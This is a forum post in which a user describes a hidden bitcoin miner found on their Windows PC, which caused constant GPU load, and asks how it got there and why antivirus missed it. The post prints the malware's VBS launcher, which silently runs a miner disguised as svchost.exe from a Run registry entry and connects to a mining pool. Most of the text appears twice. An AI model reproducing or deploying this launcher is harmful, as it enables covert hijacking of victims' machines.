Yesterday I noticed that my gpu fan was running quite loud and when I checked MSI afterburner the GPU usage was nearly 99% constant under no load. Re-installed older drivers and the problem was still there.
Eventually discovered that an svchost.exe process was the culprit but Avast and malwarebytes found nothing. Checked the registry under all the Run entries in HKEY_USERS\xxxxxxxxxxx\Software\Microsoft\Windows\CurrentVersion\Run and found an entry for a file called WinINIT.vbs located in a directory called C:\Users\Public\Data. The entry title was RPClocater or something like that.
I looked in this Data directory and found quite a few files including the offending svchost.exe.
The WinINIT.vbs was a script that loads the svchost.exe and was actually a bitcoin farming tool.
Here's what was in the vbs script:
"Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "cmd /c cd c:\Users\Public\Data\ & svchost.exe -d 0 -v -w 128 -f 350 http://drpepper6969_tmb:[email protected]:3333", 0 "
I removed all the files and so far it seems the problem is gone. Does anyone know how I could have got this malware and why no virus programs can detect it?
Eventually discovered that an svchost.exe process was the culprit but Avast and malwarebytes found nothing. Checked the registry under all the Run entries in HKEY_USERS\xxxxxxxxxxx\Software\Microsoft\Windows\CurrentVersion\Run and found an entry for a file called WinINIT.vbs located in a directory called C:\Users\Public\Data. The entry title was RPClocater or something like that.
I looked in this Data directory and found quite a few files including the offending svchost.exe.
The WinINIT.vbs was a script that loads the svchost.exe and was actually a bitcoin farming tool.
Here's what was in the vbs script:
"Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "cmd /c cd c:\Users\Public\Data\ & svchost.exe -d 0 -v -w 128 -f 350 http://drpepper6969_tmb:[email protected]:3333", 0 "
I removed all the files and so far it seems the problem is gone. Does anyone know how I could have got this malware and why no virus programs can detect it?
Last edited: